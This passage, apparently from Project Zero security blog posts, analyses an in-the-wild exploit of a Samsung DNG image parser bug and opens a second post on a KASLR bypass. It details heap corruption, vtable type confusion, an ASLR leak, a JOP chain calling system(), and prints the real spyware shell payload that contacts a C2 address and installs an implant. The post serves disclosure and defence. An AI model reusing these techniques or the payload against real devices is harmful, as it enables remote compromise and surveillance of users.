    0xb400007e3e3fb820:     0x0000000300000003      0xb400007f1e2d7ad0

    0xb400007e3e3fb830:     0xb400007e3e3f7850      0x0000000000000030

    After:

    0xb400007e3e3fb810:     0x0000000000000000      0x6666000166660001

    0xb400007e3e3fb820:     0x0000000300000003      0xb400007f1e2d7ad0

    0xb400007e3e3fb830:     0xb400007e3e3f7850      0x0000000000000030


    If we look for example at the first MapTable that follows, it looks like:


    Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=5120, b=1, r=5121, p=0:1, rp=1, cp=1

    Count: 65536


    Under regular circumstances, the “left” and “right” values would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage, though, this opcode will operate out of bounds.

    Extending the primitives

    Incrementing arbitrary out-of-bounds values by chosen amounts is a powerful primitive, but the exploit also wants to write arbitrary absolute values out of bounds. Fortunately, the former can be converted into the latter fairly easily.


    If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.


    Zeroing memory can be done in two ways, and both are used in the exploit:


    • Using the MapTable opcode with a substitution table of all zeros

    • Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.


    In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).
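    The combination can be modeled as follows. This is a sketch of the primitives' effect on memory, not of the actual opcode implementations:

```python
def zero(mem, off, n):
    """Model of the zeroing primitive (a MapTable with an all-zero
    substitution table, or a DeltaPerColumn with a -Infinity delta)."""
    for i in range(off, off + n):
        mem[i] = 0

def add16(mem, off, delta):
    """Model of the DeltaPerColumn increment primitive: add `delta` to
    the little-endian 16-bit value at byte offset `off`."""
    value = (mem[off] | (mem[off + 1] << 8)) + delta
    mem[off] = value & 0xff
    mem[off + 1] = (value >> 8) & 0xff

def write16(mem, off, value):
    """Absolute write built from the two relative primitives: zero the
    target, then increment it by the desired value."""
    zero(mem, off, 2)
    add16(mem, off, value)

mem = bytearray(b"\xaa" * 8)   # unknown prior contents
write16(mem, 2, 0x6666)        # mem[2:4] is now 66 66 regardless of what was there
```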

    Crafting a bogus MapTable opcode

    With a linear out-of-bounds write primitive in place, the exploit could now:

    • Write a shell command somewhere out of bounds

    • Write a JOP gadget chain somewhere out of bounds which ends up calling system()

    • Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution


    There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.


    Let’s show the first MapTable opcode again:



    Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=5120, b=1, r=5121, p=0:1, rp=1, cp=1

    Count: 65536



    This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.
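    That offset follows directly from the pixel layout (assuming, as above, 2 bytes per sample and 3 color planes per pixel):

```python
BYTES_PER_SAMPLE = 2
PLANES_PER_PIXEL = 3

def column_to_byte_offset(left):
    """Byte offset into the raw pixel buffer of pixel column `left`
    (for a single-row image like the stage 3 buffer)."""
    return left * BYTES_PER_SAMPLE * PLANES_PER_PIXEL

offset = column_to_byte_offset(5120)   # 0x7800
```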





    It is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values are mapped to themselves; a few, however, are not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated.)


    For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.


    Their substitution table supports different versions of the library, which works because there are not that many versions (the exploit supports 7) and the lower bytes of the vtable addresses do not collide across versions. Moreover, since ASLR is applied at page-level granularity, they need to account for every page multiple the vtable can be mapped at. Say we have the following vtable offsets:




    libimagecodec.quram.so                      version x    version y

    QuramDngOpcodeTrimBounds vtable offset      0x2dccf0     0x2dce10

    QuramDngOpcodeMapTable vtable offset        0x2dcd30     0x2dce50

    Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):


    index  : value

    0x0cf0 : 0x0d30

    0x0e10 : 0x0e50

    0x1cf0 : 0x1d30

    0x1e10 : 0x1e50

    0x2cf0 : 0x2d30

    0x2e10 : 0x2e50

    0x3cf0 : 0x3d30

    0x3e10 : 0x3e50

    0x4cf0 : 0x4d30

    0x4e10 : 0x4e50

    0x5cf0 : 0x5d30

    0x5e10 : 0x5e50

    0x6cf0 : 0x6d30

    0x6e10 : 0x6e50

    0x7cf0 : 0x7d30

    0x7e10 : 0x7e50

    0x8cf0 : 0x8d30

    0x8e10 : 0x8e50

    0x9cf0 : 0x9d30

    0x9e10 : 0x9e50

    0xacf0 : 0xad30

    0xae10 : 0xae50

    0xbcf0 : 0xbd30

    0xbe10 : 0xbe50

    0xccf0 : 0xcd30

    0xce10 : 0xce50

    0xdcf0 : 0xdd30

    0xde10 : 0xde50

    0xecf0 : 0xed30

    0xee10 : 0xee50

    0xfcf0 : 0xfd30

    0xfe10 : 0xfe50
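    A table like this can be generated mechanically. Here is a sketch using the two hypothetical version offsets from the table above (the real exploit covers 7 library versions):

```python
TABLE_ENTRIES = 0x10000   # the substitution table has 65536 16-bit entries
PAGE = 0x1000             # ASLR granularity: the low 12 bits of an address are fixed

# (TrimBounds vtable offset, MapTable vtable offset) per library version
VERSIONS = [
    (0x2dccf0, 0x2dcd30),   # libimagecodec.quram.so version x
    (0x2dce10, 0x2dce50),   # libimagecodec.quram.so version y
]

def build_table():
    table = list(range(TABLE_ENTRIES))   # identity for entries that don't matter
    for trim, maptbl in VERSIONS:
        # Only the 4th nibble of the low 16 address bits depends on the
        # ASLR slide, so enumerate all 16 possible page multiples.
        for slide in range(0, TABLE_ENTRIES, PAGE):
            table[slide | (trim & 0xfff)] = slide | (maptbl & 0xfff)
    return table

table = build_table()
```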



    Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.


    The constructed bogus MapTable opcode object looks like this:



    Before:

    00007800: f0fc f8cc 7f00 0000 0600 0000 0100 0401  // TrimBounds opcode X

    00007810: 0100 0000 0100 0000 0300 0000 0000 0000  

    00007820: 0000 0000 0100 0000 0100 0000 0000 0000  

    00007830: 0301 0300 0000 71ca 0000 0000 0000 0000  

    00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401  // TrimBounds opcode Y


    After:

    00007800: 30fd f8cc 7f00 0000 0600 0000 0000 0401  

               | |                           \----> Will prevent bailout in QuramDngOpcode::aboutToApply

               \---> changed vtable pointer, from TrimBounds to MapTable 

    00007810: 0100 0000 0100 0000 0300 0000 0000 0000  // Arguments of bogus MapTable,

    00007820: 0028 0000 0100 0000 982c 0000 0000 0000  // such as top, left, bottom, right,

    00007830: 0100 0000 0100 0000 0100 0000 0000 0000  // plane, planes, ...

    00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401 

              \----------------> vtable of the neighboring TrimBounds opcode, interpreted here

                                      as the pointer to the MapTable's substitution table 


    The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.



    /-< Zero'ed memory at offset 0xf000:                   0000 0000 0000 0000 0000 ...

    |

    |-< MapTable substitution table (TrimBounds vtable):   04b2 a4cd 7f00 0000 a85e ....

    |

    \-> Transformed memory at offset 0xf000:               04b2 04b2 04b2 04b2 04b2 ....


    Leaking interesting pointers

    Using the above technique, we can leak arbitrary values at offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied to other offsets (the substitution table has 65536 entries, so the maximum index is 65535).


    Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:



    /-< Prepared memory at offset 0xf000:                                   f001 f101 f201 f301 ...

    |

    |-< MapTable substitution table (TrimBounds vtable) at offset 0x1f0:    4c5a ebcc 7f00 0000 ....

    |

    \-> Transformed memory at offset 0xf000:                                4c5a ebcc 7f00 0000 ....


    Again, the exploit needs to support different library versions, which have the pointers to leak at different offsets from the vtable. Based on the first leak at offset 0, however, we can “calculate” the right offsets to leak using another MapTable operation.


    In summary the process goes as follows (illustrated below):

    1. Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.

    2. Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.

    3. Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.

    4. Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.

    5. The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.
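    These steps can be simulated end to end in a simplified model. The constants mirror the example dumps above, the MapTable index-to-offset mapping is idealized (entry i is the i-th 16-bit word after the vtable), and step 3 is modeled as a direct rewrite of the cells:

```python
import struct

# Constants mirroring the example dumps above (actual addresses vary per boot).
VTABLE_ENTRY0 = 0x7fcda4b204   # first TrimBounds vtable slot (the destructor)
SECRET_PTR    = 0x7fcceb5a4c   # the pointer we want to leak
LEAK_INDEX    = 0x1f0          # 16-bit-word index of SECRET_PTR after the vtable

# Library memory, starting at the TrimBounds vtable.
lib = bytearray(0x1000)
struct.pack_into("<Q", lib, 0, VTABLE_ENTRY0)
struct.pack_into("<Q", lib, 2 * LEAK_INDEX, SECRET_PTR)

# A bogus MapTable treats this memory as an array of 16-bit entries.
lib_words = [struct.unpack_from("<H", lib, 2 * i)[0] for i in range(0x800)]

def maptable(cells, table):
    """Substitute every 16-bit cell through a 16-bit lookup table."""
    return [table[c] for c in cells]

# Steps 1-2: apply the bogus MapTable to zeroed cells; every cell becomes
# the low 16 bits of the first vtable entry (slide- and version-dependent).
cells = maptable([0, 0, 0, 0], lib_words)
assert cells == [VTABLE_ENTRY0 & 0xffff] * 4

# Step 3 (modeled directly): further opcodes rewrite that known value into
# consecutive indices of the pointer to leak.
cells = [LEAK_INDEX + i for i in range(4)]

# Steps 4-5: a second bogus MapTable substitutes those indices into the
# 16-bit words of library memory, writing the leaked pointer to the heap.
leaked = struct.unpack("<Q", struct.pack("<4H", *maptable(cells, lib_words)))[0]
```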



    The memory used for preparing these pointers is at offset 0xf000 from the raw pixel buffer, which falls in the region containing the last series of 1040 “unknown” opcodes. This memory will become the JOP chain.


    The leaked pointers are mostly pointers to functions inside libimagecodec.quram.so, as well as the value of libc’s __system_property_get, which is located in the GOT. Conveniently, the .got segment is located after the TrimBounds vtable, and within a 65536-byte offset.


    Preparing the payload

    By using more MapTable operations, we can change the leaked pointers to the JOP gadget addresses we are interested in. The leaked libc pointer is changed to the address of system.


    This is an overview of the leaked pointers and to what they are changed:


    (raw pixel buffer offset: leaked value -> remapped value for the JOP chain)

    • 0xf000: QuramDngFunctionExposureRamp::~QuramDngFunctionExposureRamp() -> qpng_check_fp_number@got.plt

    • 0xf038: QuramDngFunctionExposureRamp::evaluate(double) -> qpng_check_IHDR+624

    • 0xf118: QuramDngException::~QuramDngException() -> __ink_jpeg_enc_process_image_data+64

    • 0xf138: QuramDngException::~QuramDngException() -> __ink_jpeg_enc_process_image_data+64

    • 0xf928: QuramDngFunctionExposureRamp::evaluate(double) -> QURAMWINK_Read_IO2+124

    • 0x10928: __system_property_get_ptr -> system

    A long shell command is also prepared at offset 0x10000 from the raw pixel buffer, which also falls in that 1040 Unknown opcodes region.


    We end up with:

    • a JOP chain prepared at offset 0xf000. Note that it is preceded by one of the 1040 Unknown opcodes with opcode ID 23 (0x17)



    • a shell command at offset 0x10000. Note again how it is within the region of the Unknown opcodes


    Triggering the JOP chain

    Similar to our initial corruption, we increment values between offsets 0x2800 and 0x6400 by 1, but this time at offset 0x22 within the objects, using DeltaPerColumn opcodes. The opcode objects there have been executed by now, so this does not affect them. However, the QuramDngImage is also there, and offset 0x20 in the QuramDngImage holds the pointer to the raw pixel buffer. By adding 1 at offset 0x22, we effectively shift the raw pixel buffer pointer by 0x10000 bytes, pointing it right at the shell command.
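    The shift works because the pointer is stored little-endian: incrementing the byte at offset 2 adds 2^16 to the value (assuming no carry out of that byte). A sketch:

```python
import struct

# Example pointer value taken from the heap dump earlier in the post.
raw_pixel_buffer_ptr = 0xb400007e3e3f7850

mem = bytearray(struct.pack("<Q", raw_pixel_buffer_ptr))
mem[2] += 1   # the DeltaPerColumn adds 1 at byte offset 2 of the pointer
shifted = struct.unpack("<Q", mem)[0]   # now points at the shell command
```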


    Finally, the DNG decoder will execute that last series of 1040 “unknown” opcodes. Offset 0xf000 - where we prepared our JOP chain - falls nicely on the boundary of one of those opcodes, so it will be executed as another opcode.


    QuramDngOpcode::aboutToApply reads the bogus vtable pointer at raw pixel buffer offset 0xf000 and calls the fourth function in it, which will be qpng_read_data.


    QuramDngOpcodeUnknown *__fastcall QuramDngOpcode::aboutToApply(QuramDngOpcode *opcode, QuramDngDecoder *decoder)

    {

        int v2; // w8

        QuramDngOpcodeUnknown *v5; // x0

        unsigned int v6; // w1


        v2 = *((_DWORD *)opcode + 4);

        if ( (v2 & 2) != 0 && *((_BYTE *)decoder + 34) )

        {

            *((_BYTE *)decoder + 5377) = 1;

            return 0;

        }

        if ( *((_DWORD *)opcode + 3) >= 0x1040001u && *((_BYTE *)opcode + 0x14) )

        {

            if ( (v2 & 1) != 0 )

                return 0;

            Throw_dng_error(-9994, 0, "QuramDngOpcode::aboutToApply 1", 0);

        }

        if ( ((*(__int64 (__fastcall **)(QuramDngOpcode *, QuramDngDecoder *))(*(_QWORD *)opcode + 0x18LL))(opcode, decoder) // bogus vtable dereference

            & 1) != 0 )

        {

            return (QuramDngOpcodeUnknown *)(((*(__int64 (__fastcall **)(QuramDngOpcode *))(*(_QWORD *)opcode + 16LL))(opcode)

                                            & 1) == 0);

        }

        else

        {

            v5 = (QuramDngOpcodeUnknown *)Throw_dng_error(-9994, 0, "QuramDngOpcode::aboutToApply 2", 0);

            return QuramDngOpcodeUnknown::QuramDngOpcodeUnknown(v5, v6);

        }

    }



    .got:00000000002E3390 qpng_check_fp_number_ptr DCQ qpng_check_fp_number  // address of vtable placed at offset 0xf000

    .got:00000000002E3398 _ZNK17QuramDngSrational9getReal64Ev_ptr DCQ QuramDngSrational::getReal64(void)

    .got:00000000002E33A0 qpng_write_IHDR_ptr DCQ qpng_write_IHDR 

    .got:00000000002E33A8 qpng_read_data_ptr DCQ qpng_read_data  // bogus vtable entry that will be called


    When qpng_read_data gets called, x0 will point to the opcode, as it is a method call. x1 points to the decoder, but is not important for the JOP chain. x2 is not specifically set up for this function call, but it still points to the QuramDngImage from QuramDngOpcodeList::doApply higher up the stack (it has not been clobbered). x2 pointing to the QuramDngImage is important for the JOP chain.


    qpng_read_data will move x0 into x19 and call the next gadget, __ink_jpeg_enc_process_image_data+64.



    qpng_read_data:

    0000000000196684    STP  X20, X19, [SP,#-0x10+var_10]!

    0000000000196688    STP  X29, X30, [SP,#0x10+var_s0]

    000000000019668C    ADD  X29, SP, #0x10

    0000000000196690    LDR  X8, [X0,#0x138]                ; x8: __ink_jpeg_enc_process_image_data+64

    0000000000196694    MOV  X19, X0                        ; x19: opcode (offset 0xf000 from the raw pixel buffer)

    0000000000196698    CBZ  X8, loc_1966C0

    000000000019669C    MOV  X0, X19

    00000000001966A0    MOV  X20, X2                        ; x20: QuramDngImage

    00000000001966A4    BLR  X8                             ; __ink_jpeg_enc_process_image_data+64

     

    We jump into the middle of __ink_jpeg_enc_process_image_data, which adds 0x20 to the QuramDngImage pointer, making x1 point at the address that contains the raw pixel buffer pointer:


    __ink_jpeg_enc_process_image_data+64:

    0000000000161664    LDR  X8, [X19,#0x928]  ; x19: opcode (offset 0xf000 from the raw pixel buffer)

                                               ; x8: QURAMWINK_Read_IO2+124

    0000000000161668    ADD  X1, X20, #0x20    ; x20: QuramDngImage 

                                               ; x1: address of QuramDngImage.raw_pixel_buffer

    000000000016166C    MOV  X0, X19           ; not relevant

    0000000000161670    BLR  X8                ; QURAMWINK_Read_IO2+124


    QURAMWINK_Read_IO2+124 then dereferences x1, which loads the raw pixel buffer pointer into x1:


    QURAMWINK_Read_IO2+124:

    0000000000154548    LDR  X8, [X19,#0x38]  ; x19: opcode (offset 0xf000 from the raw pixel buffer)

                                              ; x8: qpng_check_IHDR+624

    000000000015454C    LDR  X0, [X19,#8]     ; clobbers x0

    0000000000154550    LDR  X1, [X1]         ; x1: dereference address of QuramDngImage.raw_pixel_buffer,

                                              ;     so x1 points to the raw pixel buffer, which was increased

                                              ;     with 0x10000 and now points at the shell command

    0000000000154554    BLR  X8               ; qpng_check_IHDR+624

    qpng_check_IHDR+624 calls qpng_error, which copies the raw pixel buffer pointer from x1 into x19:


    qpng_check_IHDR+624:

    0000000000189608    MOV  X0, X19                        ; x19: opcode (offset 0xf000 from the raw pixel buffer)

    000000000018960C    BL   .qpng_error


    qpng_error:

    000000000018BD30    STP  X20, X19, [SP,#-0x10+var_10]!  

    000000000018BD34    STP  X29, X30, [SP,#0x10+var_s0]

    000000000018BD38    ADD  X29, SP, #0x10

    000000000018BD3C    MOV  X19, X1                        ; x19: address of shell command

    000000000018BD40    MOV  X20, X0

    000000000018BD44    CBZ  X0, loc_18BD5C

    000000000018BD48    LDR  X8, [X20,#0x118]               ; x8: __ink_jpeg_enc_process_image_data+64

    000000000018BD4C    CBZ  X8, loc_18BD5C

    000000000018BD50    MOV  X0, X20                       

    000000000018BD54    MOV  X1, X19                       

    000000000018BD58    BLR  X8                             ; __ink_jpeg_enc_process_image_data+64


    We execute the __ink_jpeg_enc_process_image_data+64 gadget a second time; this time it copies the raw pixel buffer pointer into x0 and calls system. The raw pixel buffer pointer was corrupted before the JOP chain to point at the shell command, resulting in a system(<shell command>) execution.


    __ink_jpeg_enc_process_image_data+64:

    0000000000161664    LDR  X8, [X19,#0x928]  ; x19: address of shell command

                                               ; x8: system

    0000000000161668    ADD  X1, X20, #0x20

    000000000016166C    MOV  X0, X19           ; x0: address of shell command

    0000000000161670    BLR  X8                ; system


    Below is a summary of the sequence of gadgets and their purpose:



    • qpng_read_data (MOV X19, X0 ; MOV X20, X2): copies the opcode address into x19 and the QuramDngImage address into x20

    • __ink_jpeg_enc_process_image_data+64 (ADD X1, X20, #0x20): makes x1 point at QuramDngImage+0x20, which contains the raw pixel buffer pointer

    • QURAMWINK_Read_IO2+124 (LDR X1, [X1]): dereferences x1, so it contains the raw pixel buffer pointer

    • qpng_check_IHDR+624 / qpng_error (MOV X19, X1): copies the raw pixel buffer pointer from x1 into x19

    • __ink_jpeg_enc_process_image_data+64 (LDR X8, [X19,#0x928] ; MOV X0, X19 ; BLR X8): copies the raw pixel buffer pointer from x19 into x0 and calls system; the pointer was corrupted before the JOP chain to point at the shell command

    • system: executes the shell command


    Payload

    The payload shell command is:


    /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92.35 >/dev/null & '; pid=`cat /proc/self/stat | cut -F 4` && ppid=`cat /proc/$pid/stat | cut -F 4`;

    rm -f /data/data/com.samsung.ipservice/files/b.so;

    rm -f /data/data/com.samsung.ipservice/files/z.zip;

    image=`find /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\ Images/ /storage/emulated/95/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1000/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1001/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1002/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1003/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1004/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1005/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1006/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1007/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1008/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1009/Media/WhatsApp\ Images/ /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/accounts/1010/Media/WhatsApp\ Images/ -type f -atime -720m -maxdepth 1 -exec grep -lo '.*066c1d8ce2834f1fbb1296f9dca73419.*' {} \; -quit 2>/dev/null` ;

    /system/bin/sh -c 'ping -c 1 -w1 -p $(test "$image" && echo 31066c1d8ce2834f1fbb1296f9dca73419 || echo 30066c1d8ce2834f1fbb1296f9dca73419) 91.132.92.35 >/dev/null & ' ;

    tail -c $(( 390245 )) "$image" > /data/data/com.samsung.ipservice/files/z.zip && unzip -o -d / /data/data/com.samsung.ipservice/files/z.zip && chmod +x /data/data/com.samsung.ipservice/files/b.so;

    R=I SEP=CAFEBABE LD_PRELOAD=/data/data/com.samsung.ipservice/files/b.so /system/bin/id;

    content write --uri "content://com.samsung.cmh/files?service_flag=update%20files%20SET%20serviceflag%3D%20serviceflag%7C66304";

    kill -9 $ppid


    It performs a series of actions:


    • It will ping a C2 server with a custom identifier

    • It deletes previously dropped artifacts, if any.

    • It searches through all WhatsApp images for itself (using a unique string)

    • It unzips b.so from itself into /data/data/com.samsung.ipservice/files/b.so. The image is effectively a polyglot of a DNG and a ZIP file.

      • Note that only the com.samsung.ipservice process is allowed to write here, which confirms this is the targeted process.

    • The second-to-last command contains the following service_flag, URL-decoded: update files SET serviceflag= serviceflag|66304. That value (66304 = 0x10300) is a flag bitmask that sets the IPService, FaceService and StoryService bits in com.samsung.cmh’s files table. These flags are used by the different services to track which files they still need to process (flag bit set to 0) and which they have already processed (flag bit set to 1). The likely objective of the attackers here is to prevent these services from reparsing the image in the future.
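    The bitmask arithmetic checks out: the value sets three bits, matching the three services named above (the exact bit-to-service mapping is an assumption here):

```python
flag = 66304
assert flag == 0x10300

# Bits OR'ed into the serviceflag column; presumably one flag bit per
# service (IPService, FaceService, StoryService).
set_bits = [b for b in range(32) if flag & (1 << b)]   # [8, 9, 16]
```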


    Finally it runs b.so, the agent.

    Fix

    Curiously, this issue was silently fixed in Samsung’s April 2025 updates. In September 2025, a CVE (CVE-2025-21042) was assigned by Samsung and the security bulletin was updated. Note that not all supported Samsung devices are serviced with monthly security updates. Some devices are on a quarterly or biannual security update schedule and might therefore have received the fix at a later date. On December 11, 2025, Samsung told us the following: "patches for SVE-2025-1959 have been deployed to all devices supported by Security Update, without exception."


    The fixed function now looks like below (simplified version). The added checks are the comparisons against image_number_of_planes.



    __int64 __fastcall QuramDngOpcodeDeltaPerColumn::processArea(

            QuramDngOpcode *opcode,

            QuramDngDecoder *decoder,

            QuramDngImage *image,

            QuramDngRect *rect)

    {

    ...

        image_buffer = image->buffer;

    ...

                    image_number_of_planes = image_buffer->planes;  // 3

                    opcode_first_plane = opcode->plane;  // 5125

    ....

                    opcode_number_of_planes = opcode->planes;  // 5123

                    opcode_last_plane = opcode_first_plane + opcode_number_of_planes;  // 5125 + 5123 = 10248

    ...


                        if ( opcode_first_plane < opcode_last_plane // 5125 < 10248

                            && opcode_first_plane < image_number_of_planes )  // 5125 < 3

                        {

    ...  // We will never go here

                                current_plane = opcode_first_plane;

    ...

                                    do

                                    {

    ...                                 // Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`

                                        current_plane++;

                                    }

                                    while ( current_plane < opcode_last_plane 

                                           && current_plane < image_number_of_planes );

    ...

    }


    As we can see from the fix:


    • The opcode_last_plane is now calculated correctly.

    • Before dereferencing the raw pixel buffer, a check is performed that the current_plane is within the number of planes of the image.

    Mitigations

    Except for some ASLR-bypassing tricks and a little bit of JOP work, no mitigations posed a significant hurdle for the attackers:


    • No control flow integrity mitigations, like PAC or BTI, are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as JOP gadgets and construct a bogus vtable.

    • The “hardened” scudo allocator wasn’t an obstacle either. The heap spraying primitives, more or less inherent to the DNG format, are quite powerful and allow for a well-predicted heap layout, even in the presence of scudo’s randomization strategy. The absence of the quarantine feature also makes it convenient to deterministically reclaim the spot of the stage 2 image.


    MTE would likely have prevented both:


    • the initial vulnerability trigger to corrupt the image dimensions

    • the hundreds of subsequent out of bounds MapTable and DeltaPerColumn operations


    thereby preventing reliable exploitation of this vulnerability, at least with the current exploit strategy.

    Conclusion

    This case illustrates how certain image formats provide strong primitives out of the box for turning a single memory corruption bug into interactionless ASLR bypasses and remote code execution. By corrupting the bounds of the pixel buffer using the bug, the rest of the exploit could be performed by using the “weird machine” that the DNG specification and its implementation provide.


    The bug exploited in this case is quite shallow and could have been found manually or through fuzzing. As Project Zero’s Reporting Transparency illustrates, several other vulnerabilities in the same component have been discovered.


    These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface and using a single vulnerability, attackers are able to access all the images and videos in an Android device’s media store, which is a very interesting capability for spyware vendors.


    I would like to thank everyone who contributed to this analysis:


    • Meta for the initial leads

    • Brendon Tiszka of Google Project Zero for the research on how the com.samsung.ipservice attack surface can be reached and the follow-up research he performed into the Quram library, leading to several more discoveries.

    • Clement Lecigne of Google Threat Intelligence Group for assisting in the analysis



    Defeating KASLR by Doing Nothing at All

    3 de Novembro de 2025, 15:09

     Posted by Seth Jenkins, Project Zero

    Introduction

    I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.

    The Linux Linear Mapping

    The linear mapping is a region in the kernel virtual address space that is a direct 1:1 unstructured representation of physical memory. Working with Jann, I learned how the kernel decided where to place this region in the virtual address space. To make it possible to analyze kernel internals on a rooted phone, Jann wrote a tool to call tracing BPF's privileged BPF_FUNC_probe_read_kernel helper, which by design permits arbitrary kernel reads. The code for this is available here. The linear mapping virtual address for a given physical address is calculated by the following macro:

    #define phys_to_virt(x)    ((unsigned long)((x) - PHYS_OFFSET) | PAGE_OFFSET)


    On Arm64 PAGE_OFFSET is simply:


    #define VA_BITS (CONFIG_ARM64_VA_BITS)

    #define _PAGE_OFFSET(va) (-(UL(1) << (va)))

    #define PAGE_OFFSET (_PAGE_OFFSET(VA_BITS))


    As CONFIG_ARM64_VA_BITS is 39 on Android, it’s easy to calculate PAGE_OFFSET = 0xffffff8000000000.
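    The same calculation can be reproduced directly (truncating to 64 bits, as the hardware does):

```python
VA_BITS = 39   # CONFIG_ARM64_VA_BITS on Android

def page_offset(va_bits):
    # _PAGE_OFFSET(va) = -(1 << va), interpreted as an unsigned 64-bit value
    return (-(1 << va_bits)) & 0xFFFFFFFFFFFFFFFF

PAGE_OFFSET = page_offset(VA_BITS)   # 0xffffff8000000000
```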

    PHYS_OFFSET is calculated by:

    extern s64 memstart_addr;

    /* PHYS_OFFSET - the physical address of the start of memory. */

    #define PHYS_OFFSET ({ VM_BUG_ON(memstart_addr & 1); memstart_addr; })


    memstart_addr is an exported variable that can be looked up in /proc/kallsyms. Using Jann’s bpf_arb_read program, it’s easy to see what this value is:


    tokay:/ # grep memstart /proc/kallsyms                                         

    ffffffee6d3b2b20 D memstart_addr

    ffffffee6d3f2f80 r __ksymtab_memstart_addr

    ffffffee6dd86cc8 D memstart_offset_seed

    tokay:/ # cd /data/local/tmp

    tokay:/data/local/tmp # ./bpf_arb_read ffffffee6d3b2b20 8                                              <

    ffffffee6d3b2b20  00 00 00 80 00 00 00 00                          |........|

    tokay:/data/local/tmp #


    This value (0x80000000) doesn’t look particularly random. In fact, memstart_addr was theoretically randomized on every boot, but in practice this hasn’t happened for a while on arm64. As of commit 1db780bafa4c, it’s no longer even theoretical: virtual address randomization of the linear map is no longer a supported feature in the arm64 Linux kernel.


    The systemic issue is that memory can (theoretically) be hot-plugged in Linux; on Android, CONFIG_MEMORY_HOTPLUG=y is enabled due to its usage in VM memory sharing. When new memory is plugged into an already running system, the Linux kernel must be able to address this new memory, including adding it to the linear map. Android on arm64 uses a page size of 4 KiB and 3-level paging, which means virtual addresses in the kernel are limited to 39 bits, unlike typical x86-64 desktops, which use 4-level paging and have 48 bits of virtual address space (for kernel and userspace combined). The linear map has to fit within this space, further shrinking the area available for it. Given that the maximum amount of theoretical physical memory is far larger than the entire possible linear map region, the kernel places the linear map at the lowest possible virtual address so it can theoretically be prepared to handle exorbitant (up to 256GB) quantities of hypothetical future hot-plugged physical memory. While it is not technically necessary to choose between memory hot-plugging support and linear map randomization, the Linux kernel developers decided not to invest the engineering effort to implement memory hot-plugging in a way that preserves linear map randomization.


    So we now know that PHYS_OFFSET will always be 0x80000000, and thus the phys_to_virt calculation becomes purely static: given any physical address, you can calculate the corresponding linear map virtual address with the following formula:

    #define phys_to_virt(x)    ((unsigned long)((x) - 0x80000000) | 0xffffff8000000000)

    Kernel physical address non-randomization

    Compounding this issue, it also happens that on Pixel phones, the bootloader decompresses the kernel itself at the same physical address every boot: 0x80010000.


    tokay:/ # grep Kernel /proc/iomem

